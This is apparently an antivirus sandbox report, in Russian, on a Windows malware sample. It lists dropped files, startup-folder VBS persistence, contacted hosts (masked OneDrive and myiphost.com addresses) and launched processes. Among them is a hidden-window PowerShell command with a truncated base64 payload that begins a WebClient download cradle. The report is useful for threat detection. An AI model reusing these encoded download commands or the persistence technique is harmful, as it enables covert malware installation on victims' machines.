Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\bbb.vbs
- %WINDIR%\serviceprofiles\localservice\appdata\roaming\microsoft\upnp device host\upnphost\udhisapi.dll
- %HOMEPATH%\music\video.mp4
- %HOMEPATH%\music\win.vbs
- 'on####ve.live.com':443
- 'yn####.#b.files.1drv.com':443
- 'up####.myiphost.com':2525
- DNS ASK on####ve.live.com
- DNS ASK yn####.#b.files.1drv.com
- DNS ASK up####.myiphost.com
- '23#.#55.255.250':1900
- 'ff#2::c':1900
- ClassName: 'WMPlayerApp' WindowName: ''
- ClassName: '\MSITPro::EventQueue' WindowName: ''
- ClassName: 'Type32_Main_Window' WindowName: ''
- '<SYSTEM32>\wscript.exe' "%HOMEPATH%\Music\win.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -enc JAB3AGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsADQAKACQAcwB0AHIAaQBuAGcAIAA9ACAAJAB3AGUAYgAuAEQAbwB3AG4AbABvAGEAZABzAHQAcgB...' (со скрытым окном)
- '%ProgramFiles(x86)%\windows media player\wmplayer.exe' /prefetch:6 /Open "%HOMEPATH%\Music\video.mp4"
- '<SYSTEM32>\wscript.exe' "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\BBB.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -enc JAB3AGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsADQAKACQAcwB0AHIAaQBuAGcAIAA9ACAAJAB3AGUAYgAuAEQAbwB3AG4AbABvAGEAZABzAHQAcgB...